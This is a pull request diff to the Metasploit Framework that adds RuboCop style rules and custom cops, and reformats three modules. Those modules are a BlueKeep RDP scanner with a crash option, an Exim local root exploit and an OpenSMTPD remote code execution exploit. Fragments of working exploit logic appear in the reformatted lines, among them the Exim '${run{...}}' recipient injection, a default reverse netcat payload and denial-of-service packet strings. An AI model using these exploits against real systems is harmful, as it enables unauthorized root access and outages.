### PR TITLE
Add rubocop rules to consistently format modules

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -11,6 +11,16 @@
 AllCops:
   TargetRubyVersion: 2.4
 
+require:
+  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
+  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+
+Layout/ModuleHashOnNewLine:
+  Enabled: true
+
+Layout/ModuleDescriptionIndentation:
+  Enabled: true
+
 Metrics/ClassLength:
   Description: 'Most Metasploit modules are quite large. This is ok.'
   Enabled: true
@@ -59,6 +69,25 @@ Style/Documentation:
   Exclude:
     - 'modules/**/*'
 
+Layout/FirstArgumentIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/ArgumentAlignment:
+  Enabled: true
+  EnforcedStyle: with_first_argument
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementLineBreak:
+  Enabled: true
+  Description: 'Enforce consistency by breaking hash elements on to new lines'
+
 Layout/SpaceInsideArrayLiteralBrackets:
   Enabled: false
   Description: 'Almost all module metadata have space in brackets'
@@ -93,26 +122,26 @@ Style/TrailingCommaInArrayLiteral:
 
 Metrics/LineLength:
   Description: >-
-                  Metasploit modules often pattern match against very
-                  long strings when identifying targets.
+    Metasploit modules often pattern match against very
+    long strings when identifying targets.
   Enabled: true
   Max: 180
 
 Metrics/BlockLength:
   Enabled: true
   Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
   Max: 300
 
 Metrics/MethodLength:
   Enabled: true
   Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
   Max: 300
 
-Naming/MethodParameterName:            
+Naming/MethodParameterName:
   Enabled: true
   Description: 'Whoever made this requirement never looked at crypto methods, IV'
   MinNameLength: 2
@@ -126,13 +155,10 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/HashAlignment:
-  Enabled: false
-  Description: 'aligning info hashes to match these rules is almost impossible to get right'
-
-Layout/EmptyLines:
-  Enabled: false
-  Description: 'these are used to increase readability'
+Layout/FirstArrayElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful to force values within the register_options array to have sane indentation'
 
 Layout/EmptyLinesAroundClassBody:
   Enabled: false
@@ -142,18 +168,23 @@ Layout/EmptyLinesAroundMethodBody:
   Enabled: false
   Description: 'these are used to increase readability'
 
-Layout/ParameterAlignment:
+Layout/ExtraSpacing:
+  Description: 'Do not use unnecessary spacing.'
   Enabled: true
-  EnforcedStyle: 'with_fixed_indentation'
-  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+  # When true, allows most uses of extra spacing if the intent is to align
+  # things with the previous or next line, not counting empty lines or comment
+  # lines.
+  AllowForAlignment: false
+  # When true, allows things like 'obj.meth(arg)  # comment',
+  # rather than insisting on 'obj.meth(arg) # comment'.
+  # If done for alignment, either this OR AllowForAlignment will allow it.
+  AllowBeforeTrailingComments: false
+  # When true, forces the alignment of `=` in assignments on consecutive lines.
+  ForceEqualSignAlignment: false
 
 Style/For:
   Enabled: false
   Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
-
-Style/StringLiterals:
-  Enabled: false
-  Description: 'Single vs double quote fights are largely unproductive.'
 
 Style/WordArray:
   Enabled: false
@@ -162,6 +193,22 @@ Style/WordArray:
 Style/IfUnlessModifier:
   Enabled: false
   Description: 'This style might save a couple of lines, but often makes code less clear'
+
+Style/PercentLiteralDelimiters:
+  Description: 'Use `%`-literal delimiters consistently.'
+  Enabled: true
+  # Specify the default preferred delimiter for all types with the 'default' key
+  # Override individual delimiters (even with default specified) by specifying
+  # an individual key
+  PreferredDelimiters:
+    default: ()
+    '%i': '[]'
+    '%I': '[]'
+    '%r': '{}'
+    '%w': '[]'
+    '%W': '[]'
+    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
+  VersionChanged: '0.48.1'
 
 Style/RedundantBegin:
   Exclude:

--- a/Gemfile
+++ b/Gemfile
@@ -36,6 +36,7 @@ group :development, :test do
   # environment is development
   gem 'rspec-rails'
   gem 'rspec-rerun'
+  gem 'rubocop'
   gem 'swagger-blocks'
 end
 

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -117,6 +117,7 @@ GEM
     arel (6.0.4)
     arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
+    ast (2.4.0)
     aws-eventstream (1.0.3)
     aws-partitions (1.279.0)
     aws-sdk-core (3.90.1)
@@ -185,6 +186,7 @@ GEM
     http_parser.rb (0.6.0)
     i18n (0.9.5)
       concurrent-ruby (~> 1.0)
+    jaro_winkler (1.5.4)
     jmespath (1.4.0)
     jsobfu (0.4.2)
       rkelly-remix
@@ -242,6 +244,9 @@ GEM
     openvas-omp (0.0.4)
     packetfu (1.1.13)
       pcaprub
+    parallel (1.19.1)
+    parser (2.7.0.2)
+      ast (~> 2.4.0)
     patch_finder (1.0.2)
     pcaprub (0.13.0)
     pdf-reader (2.4.0)
@@ -281,6 +286,7 @@ GEM
       activesupport (= 4.2.11.1)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
+    rainbow (3.0.0)
     rake (13.0.1)
     rb-readline (0.5.5)
     recog (2.3.7)
@@ -333,6 +339,7 @@ GEM
     rex-text (0.2.24)
     rex-zip (0.1.3)
       rex-text
+    rexml (3.2.4)
     rkelly-remix (0.0.7)
     rspec (3.9.0)
       rspec-core (~> 3.9.0)
@@ -357,7 +364,16 @@ GEM
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
     rspec-support (3.9.2)
+    rubocop (0.80.0)
+      jaro_winkler (~> 1.5.1)
+      parallel (~> 1.10)
+      parser (>= 2.7.0.1)
+      rainbow (>= 2.2.2, < 4.0)
+      rexml
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 1.7)
     ruby-macho (2.2.0)
+    ruby-progressbar (1.10.1)
     ruby-rc4 (0.1.5)
     ruby_smb (1.1.0)
       bindata
@@ -392,6 +408,7 @@ GEM
       thread_safe (~> 0.1)
     tzinfo-data (1.2019.3)
       tzinfo (>= 1.0.0)
+    unicode-display_width (1.6.1)
     warden (1.2.7)
       rack (>= 1.0)
     websocket-driver (0.7.1)
@@ -417,6 +434,7 @@ DEPENDENCIES
   redcarpet
   rspec-rails
   rspec-rerun
+  rubocop
   simplecov
   sqlite3 (~> 1.3.0)
   swagger-blocks

--- a/lib/rubocop/cop/layout/module_description_indentation.rb
+++ b/lib/rubocop/cop/layout/module_description_indentation.rb
@@ -1,0 +1,78 @@
+module RuboCop
+  module Cop
+    module Layout
+      class ModuleDescriptionIndentation < Cop
+        include Alignment
+
+        MSG = "Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }"
+
+        def_node_matcher :find_update_info_node, <<~PATTERN
+          (def :initialize _args (begin (super $(send nil? {:update_info :merge_info} (lvar :info) (hash ...))) ...))
+        PATTERN
+
+        def_node_matcher :find_nested_update_info_node, <<~PATTERN
+          (def :initialize _args (super $(send nil? {:update_info :merge_info} (lvar :info) (hash ...)) ...))
+        PATTERN
+
+        def on_def(node)
+          update_info_node = find_update_info_node(node) || find_nested_update_info_node(node)
+          return if update_info_node.nil?
+
+          hash = update_info_node.arguments.find { |argument| hash_arg?(argument) }
+          hash.each_pair do |key, value|
+            if key.value == "Description"
+              if requires_correction?(key, value)
+                add_offense(value, location: :end)
+              end
+            end
+          end
+        end
+
+        def autocorrect(description_value)
+          lambda do |corrector|
+            description_key = description_value.parent.key
+            new_content = indent_description_value_correctly(description_key, description_value)
+
+            corrector.replace(description_value.source_range, new_content)
+          end
+        end
+
+        private
+
+        def requires_correction?(description_key, description_value)
+          return false if description_value.single_line?
+
+          current_content = description_value.source
+          expected_content = indent_description_value_correctly(description_key, description_value)
+          expected_content != current_content
+        end
+
+        def indent_description_value_correctly(description_key, description_value)
+          content_whitespace = indentation(description_key)
+          final_line_whitespace = offset(description_key)
+
+          description_content = description_value.source.lines[1...-1]
+          indented_description = description_content.map do |line|
+            cleaned_content = line.strip
+            if cleaned_content.empty?
+              "\n"
+            else
+              "#{content_whitespace}#{cleaned_content}\n"
+            end
+          end.join
+
+          new_literal = "%q{\n"
+          new_literal <<= indented_description
+          new_literal <<= final_line_whitespace
+          new_literal <<= '}'
+
+          new_literal
+        end
+
+        def hash_arg?(node)
+          node.type == :hash
+        end
+      end
+    end
+  end
+end

--- a/lib/rubocop/cop/layout/module_hash_on_new_line.rb
+++ b/lib/rubocop/cop/layout/module_hash_on_new_line.rb
@@ -1,0 +1,87 @@
+module RuboCop
+  module Cop
+    module Layout
+      class ModuleHashOnNewLine < Cop
+        include Alignment
+
+        MSG = "%<name>s should start on its own line"
+        MISSING_NEW_LINE_MSG = "A new line is missing"
+
+        def_node_matcher :find_update_info_node, <<~PATTERN
+          (def :initialize _args (begin (super $(send nil? {:update_info :merge_info} (lvar :info) (hash ...))) ...))
+        PATTERN
+
+        def_node_matcher :find_nested_update_info_node, <<~PATTERN
+          (def :initialize _args (super $(send nil? {:update_info :merge_info} (lvar :info) (hash ...)) ...))
+        PATTERN
+
+        def on_def(node)
+          update_info_node = find_update_info_node(node) || find_nested_update_info_node(node)
+          return if update_info_node.nil?
+
+          unless begins_its_line?(update_info_node.source_range)
+            add_offense(update_info_node, location: :begin)
+          end
+
+          # Ensure every argument to update_info is on its own line, i.e. info and the hash arguments
+          update_info_node.arguments.each do |argument|
+            unless begins_its_line?(argument.source_range)
+              add_offense(argument)
+            end
+          end
+
+          if missing_new_line_after_parenthesis?(update_info_node)
+            add_offense(update_info_node, location: :end, message: MISSING_NEW_LINE_MSG)
+          end
+        end
+
+        def autocorrect(node)
+          lambda do |corrector|
+            if merge_function?(node) && missing_new_line_after_parenthesis?(node)
+              # Ensure there's always a new line after `update_info(...)` to avoid `))` at the end of the `super(update_info` call
+              corrector.replace(node.source_range.end, "\n#{offset(node.parent)}")
+            else
+              # Force a new line, and indent to the parent node. Other Layout rules will correct the positioning.
+              corrector.replace(node.source_range, "\n#{indentation(node.parent)}#{node.source}")
+            end
+          end
+        end
+
+        private
+
+        def message(node)
+          if update_info?(node)
+            format(MSG, name: :update_info)
+          elsif merge_info?(node)
+            format(MSG, name: :merge_info)
+          elsif info_arg?(node)
+            format(MSG, name: :info)
+          else
+            format(MSG, name: :argument)
+          end
+        end
+
+        def merge_function?(node)
+          update_info?(node) || merge_info?(node)
+        end
+
+        def update_info?(node)
+          node.type == :send && node.method_name == :update_info
+        end
+
+        def merge_info?(node)
+          node.type == :send && node.method_name == :merge_info
+        end
+
+        def info_arg?(node)
+          node.type == :lvar && node.children[0] == :info
+        end
+
+        def missing_new_line_after_parenthesis?(update_info_node)
+          super_call = update_info_node.parent
+          super_call.source.end_with? '))'
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
+++ b/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
@@ -9,50 +9,53 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',
-      'Description'    => %q{
-        This module checks a range of hosts for the CVE-2019-0708 vulnerability
-        by binding the MS_T120 channel outside of its normal slot and sending
-        non-DoS packets which respond differently on patched and vulnerable hosts.
-        It can optionally trigger the DoS vulnerability.
-      },
-      'Author'         =>
-        [
-          'National Cyber Security Centre', # Discovery
-          'JaGoTu',                         # Module
-          'zerosum0x0',                     # Module
-          'Tom Sellers'                     # TLS support, packet documenentation, DoS implementation
+    super(
+      update_info(
+        info,
+        'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',
+        'Description' => %q{
+          This module checks a range of hosts for the CVE-2019-0708 vulnerability
+          by binding the MS_T120 channel outside of its normal slot and sending
+          non-DoS packets which respond differently on patched and vulnerable hosts.
+          It can optionally trigger the DoS vulnerability.
+        },
+        'Author' =>
+          [
+            'National Cyber Security Centre', # Discovery
+            'JaGoTu', # Module
+            'zerosum0x0', # Module
+            'Tom Sellers' # TLS support, packet documenentation, DoS implementation
+          ],
+        'References' =>
+          [
+            [ 'CVE', '2019-0708' ],
+            [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],
+            [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]
+          ],
+        'DisclosureDate' => '2019-05-14',
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          ['Scan', 'Description' => 'Scan for exploitable targets'],
+          ['Crash', 'Description' => 'Trigger denial of service vulnerability'],
         ],
-      'References'     =>
-        [
-          [ 'CVE', '2019-0708' ],
-          [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],
-          [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]
-        ],
-      'DisclosureDate' => '2019-05-14',
-      'License'        => MSF_LICENSE,
-      "Actions" => [
-        ["Scan", "Description" => "Scan for exploitable targets"],
-        ["Crash", "Description" => "Trigger denial of service vulnerability"],
-      ],
-      "DefaultAction" => "Scan",
-      'Notes'          =>
-        {
-          'Stability' => [ CRASH_SAFE ],
-          'AKA'       => ['BlueKeep']
-        }
-    ))
+        'DefaultAction' => 'Scan',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'AKA' => ['BlueKeep']
+          }
+      )
+    )
   end
 
   def report_goods
     report_vuln(
-      :host  => rhost,
-      :port  => rport,
-      :proto => 'tcp',
-      :name  => self.name,
-      :info  => 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',
-      :refs  => self.references
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: name,
+      info: 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',
+      refs: references
     )
   end
 
@@ -89,7 +92,7 @@ class MetasploitModule < Msf::Auxiliary
       begin
         rdp_connect
       rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
-        return Exploit::CheckCode::Safe("The target service is not running or refused our connection.")
+        return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')
       end
 
       status = check_rdp_vuln
@@ -99,11 +102,11 @@ class MetasploitModule < Msf::Auxiliary
       vprint_line(bt)
       elog("#{e.message}\n#{bt}")
     rescue RdpCommunicationError
-      vprint_error("Error communicating RDP protocol.")
+      vprint_error('Error communicating RDP protocol.')
       status = Exploit::CheckCode::Unknown
     rescue Errno::ECONNRESET
-      vprint_error("Connection reset")
-    rescue => e
+      vprint_error('Connection reset')
+    rescue StandardError => e
       bt = e.backtrace.join("\n")
       vprint_error("Unexpected error: #{e.message}")
       vprint_line(bt)
@@ -130,28 +133,28 @@ class MetasploitModule < Msf::Auxiliary
 
     # Disconnect Provider message of a valid size for each platform
     # has proven to be safe to send as part of the vulnerability check.
-    x86_string = "00000000020000000000000000000000"
-    x64_string = "0000000000000000020000000000000000000000000000000000000000000000"
+    x86_string = '00000000020000000000000000000000'
+    x64_string = '0000000000000000020000000000000000000000000000000000000000000000'
 
     if action.name == 'Crash'
-      vprint_status("Sending denial of service payloads")
+      vprint_status('Sending denial of service payloads')
       # Length and chars are arbitrary but total length needs to be longer than
       # 16 for x86 and 32 for x64. Making the payload too long seems to cause
       # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing
       # the payload size and sending more of them doesn't seem to improve the
       # reliability. It *seems* to happen more often on x64, I haven't seen it
       # fail against x86. Repeated attempts will generally trigger the DoS.
-      x86_string += "FF" * 1
-      x64_string += "FF" * 2
+      x86_string += 'FF' * 1
+      x64_string += 'FF' * 2
     else
-      vprint_status("Sending patch check payloads")
+      vprint_status('Sending patch check payloads')
     end
 
     chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST
     channel_id = [1005].pack('S>')
-    x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack("H*")), channel_id)
+    x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)
 
-    x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack("H*")), channel_id)
+    x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)
 
     6.times do
       rdp_send(x86_packet)
@@ -167,8 +170,8 @@ class MetasploitModule < Msf::Auxiliary
           print_error("Target doesn't appear to have been crashed. Consider retrying.")
           return Exploit::CheckCode::Unknown
         else
-          print_good("Target service appears to have been successfully crashed.")
-          return Exploit::CheckCode::Vulnerable("The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.")
+          print_good('Target service appears to have been successfully crashed.')
+          return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')
         end
       end
 
@@ -178,7 +181,7 @@ class MetasploitModule < Msf::Auxiliary
       rescue EOFError
         # we don't care
       end
-      return Exploit::CheckCode::Vulnerable("The target attempted cleanup of the incorrectly-bound MS_T120 channel.") if res&.include?(["0300000902f0802180"].pack("H*"))
+      return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))
 
       # Slow check for Ultimatum PDU. If it doesn't respond in a timely
       # manner then the host is likely patched.
@@ -186,8 +189,8 @@ class MetasploitModule < Msf::Auxiliary
         4.times do
           res = rdp_recv
           # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3
-          if res.include?(["0300000902f0802180"].pack("H*"))
-            return Exploit::CheckCode::Vulnerable("The target attempted cleanup of the incorrectly-bound MS_T120 channel.")
+          if res.include?(['0300000902f0802180'].pack('H*'))
+            return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')
           end
         end
       rescue RdpCommunicationError
@@ -202,7 +205,7 @@ class MetasploitModule < Msf::Auxiliary
     # check if rdp is open
     is_rdp, version_info = rdp_fingerprint
     unless is_rdp
-      vprint_error("Could not connect to RDP service.")
+      vprint_error('Could not connect to RDP service.')
       return Exploit::CheckCode::Unknown
     end
     rdp_disconnect
@@ -219,16 +222,16 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status(info)
 
     if requires_nla
-      vprint_status("Server requires NLA (CredSSP) security which mitigates this vulnerability.")
+      vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')
       return Exploit::CheckCode::Safe
     end
 
     chans = [
       ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
-      ['MS_T120',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
-      ['rdpsnd',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
-      ['snddbg',  RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
-      ['rdpdr',   RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
+      ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
+      ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
+      ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
+      ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],
     ]
 
     success = rdp_negotiate_security(chans, server_selected_proto)

--- a/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
+++ b/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
@@ -12,58 +12,63 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::System
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Exim 4.87 - 4.91 Local Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
-        Improper validation of recipient address in deliver_message()
-        function in /src/deliver.c may lead to command execution with root privileges
-        (CVE-2019-10149).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Qualys', # Discovery and PoC (@qualys)
-          'Dennis Herrmann', # Working exploit (@dhn)
-          'Marco Ivaldi', # Working exploit (@0xdea)
-          'Guillaume André' # Metasploit module (@yaumn_)
-        ],
-      'DisclosureDate' => '2019-06-05',
-      'Platform'       => [ 'linux' ],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
-      'Targets'        =>
-        [
-          [
-            'Exim 4.87 - 4.91',
-            lower_version: Gem::Version.new('4.87'),
-            upper_version: Gem::Version.new('4.91')
-          ]
-        ],
-      'DefaultOptions' =>
-        {
-          'PrependSetgid' => true,
-          'PrependSetuid' => true
+    super(
+      update_info(
+        info,
+        'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
+        'Description' => %q{
+          This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
+          Improper validation of recipient address in deliver_message()
+          function in /src/deliver.c may lead to command execution with root privileges
+          (CVE-2019-10149).
         },
-      'References'     =>
-        [
-          [ 'CVE', '2019-10149' ],
-          [ 'EDB', '46996' ],
-          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
-        ]
-    ))
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Qualys', # Discovery and PoC (@qualys)
+            'Dennis Herrmann', # Working exploit (@dhn)
+            'Marco Ivaldi', # Working exploit (@0xdea)
+            'Guillaume André' # Metasploit module (@yaumn_)
+          ],
+        'DisclosureDate' => '2019-06-05',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' =>
+          [
+            [
+              'Exim 4.87 - 4.91',
+              lower_version: Gem::Version.new('4.87'),
+              upper_version: Gem::Version.new('4.91')
+            ]
+          ],
+        'DefaultOptions' =>
+          {
+            'PrependSetgid' => true,
+            'PrependSetuid' => true
+          },
+        'References' =>
+          [
+            [ 'CVE', '2019-10149' ],
+            [ 'EDB', '46996' ],
+            [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
+          ]
+      )
+    )
 
     register_options(
       [
         OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
-      ])
+      ]
+    )
 
     register_advanced_options(
       [
         OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
         OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),
         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
-      ])
+      ]
+    )
   end
 
   def base_dir
@@ -76,17 +81,17 @@ class MetasploitModule < Msf::Exploit::Local
 
   def open_tcp_connection
     socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
-      params = Rex::Socket::Parameters.new({
-        'PeerHost' => '127.0.0.1',
-        'PeerPort' => datastore['EXIMPORT']
-      })
-      begin
-        socket = socket_subsystem.create_tcp_client_channel(params)
-      rescue => e
-        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
-                    "are you sure exim is listening on this port? (see EXIMPORT)")
-        raise e
-      end
+    params = Rex::Socket::Parameters.new({
+      'PeerHost' => '127.0.0.1',
+      'PeerPort' => datastore['EXIMPORT']
+    })
+    begin
+      socket = socket_subsystem.create_tcp_client_channel(params)
+    rescue StandardError => e
+      vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
+                  'are you sure exim is listening on this port? (see EXIMPORT)')
+      raise e
+    end
     return socket_subsystem, socket
   end
 
@@ -95,13 +100,13 @@ class MetasploitModule < Msf::Exploit::Local
       socket_subsystem, socket = open_tcp_connection
 
       tcp_conversation = {
-        nil                                          => /220/,
-        'helo localhost'                             => /250/,
-        "MAIL FROM:<>"                               => /250/,
-        "RCPT TO:<${run{#{payload}}}@localhost>"     => /250/,
-        'DATA'                                       => /354/,
-        'Received:'                                  => nil,
-        '.'                                          => /250/
+        nil => /220/,
+        'helo localhost' => /250/,
+        'MAIL FROM:<>' => /250/,
+        "RCPT TO:<${run{#{payload}}}@localhost>" => /250/,
+        'DATA' => /354/,
+        'Received:' => nil,
+        '.' => /250/
       }
 
       begin
@@ -131,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
     else
       unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\
-                      "&& echo true").chomp.to_s == 'true'
+                      '&& echo true').chomp.to_s == 'true'
         fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
       end
 
@@ -189,7 +194,7 @@ class MetasploitModule < Msf::Exploit::Local
     if session.type == 'meterpreter'
       begin
         socket_subsystem, socket = open_tcp_connection
-      rescue
+      rescue StandardError
         return CheckCode::Safe
       end
       res = socket.gets
@@ -200,14 +205,14 @@ class MetasploitModule < Msf::Exploit::Local
       res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "\
                      "(read -u 3 && echo $REPLY) || echo false'")
       if res == 'false'
-         vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
-                      "are you sure exim is listening on this port? (see EXIMPORT)")
-         return CheckCode::Safe
+        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
+                     'are you sure exim is listening on this port? (see EXIMPORT)')
+        return CheckCode::Safe
       end
     end
 
     if res =~ /Exim ([0-9\.]+)/i
-      version = Gem::Version.new($1)
+      version = Gem::Version.new(Regexp.last_match(1))
       vprint_status("Found exim version: #{version}")
       if version >= target[:lower_version] && version <= target[:upper_version]
         return CheckCode::Appears

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -12,39 +12,41 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Expect
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
-      'Description'    => %q{
-        This module exploits a command injection in the MAIL FROM field during
-        SMTP interaction with OpenSMTPD to execute a command as the root user.
-      },
-      'Author'         => [
-        'Qualys',                               # Discovery and PoC
-        'wvu',                                  # Module
-        'RageLtMan <rageltman[at]sempervictus>' # Module
-      ],
-      'References'     => [
-        ['CVE', '2020-7247'],
-        ['URL', 'https://seclists.org/oss-sec/2020/q1/40']
-      ],
-      'DisclosureDate' => '2020-01-28',
-      'License'        => MSF_LICENSE,
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Privileged'     => true,
-      'Targets'        => [
-        ['OpenSMTPD < 6.6.1',
-          'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
-        ]
-      ],
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'},
-      'Notes'          => {
-        'Stability'    => [CRASH_SAFE],
-        'Reliability'  => [REPEATABLE_SESSION],
-        'SideEffects'  => [IOC_IN_LOGS]
-      }
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',
+        'Description' => %q{
+          This module exploits a command injection in the MAIL FROM field during
+          SMTP interaction with OpenSMTPD to execute a command as the root user.
+        },
+        'Author' => [
+          'Qualys', # Discovery and PoC
+          'wvu', # Module
+          'RageLtMan <rageltman[at]sempervictus>' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-7247'],
+          ['URL', 'https://seclists.org/oss-sec/2020/q1/40']
+        ],
+        'DisclosureDate' => '2020-01-28',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Targets' => [
+          ['OpenSMTPD < 6.6.1',
+           'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(25),
@@ -52,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
 
     register_advanced_options([
-      OptBool.new('ForceExploit',   [false, 'Override check result', false]),
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
       OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
     ])
   end
@@ -97,14 +99,14 @@ class MetasploitModule < Msf::Exploit::Remote
     body = "\r\n" + "#\r\n" * 15 + payload.encoded
 
     sploit = {
-      nil                   => /220.*OpenSMTPD/,
-      "HELO #{me}"          => /250.*pleased to meet you/,
+      nil => /220.*OpenSMTPD/,
+      "HELO #{me}" => /250.*pleased to meet you/,
       "MAIL FROM:<#{from}>" => /250.*Ok/,
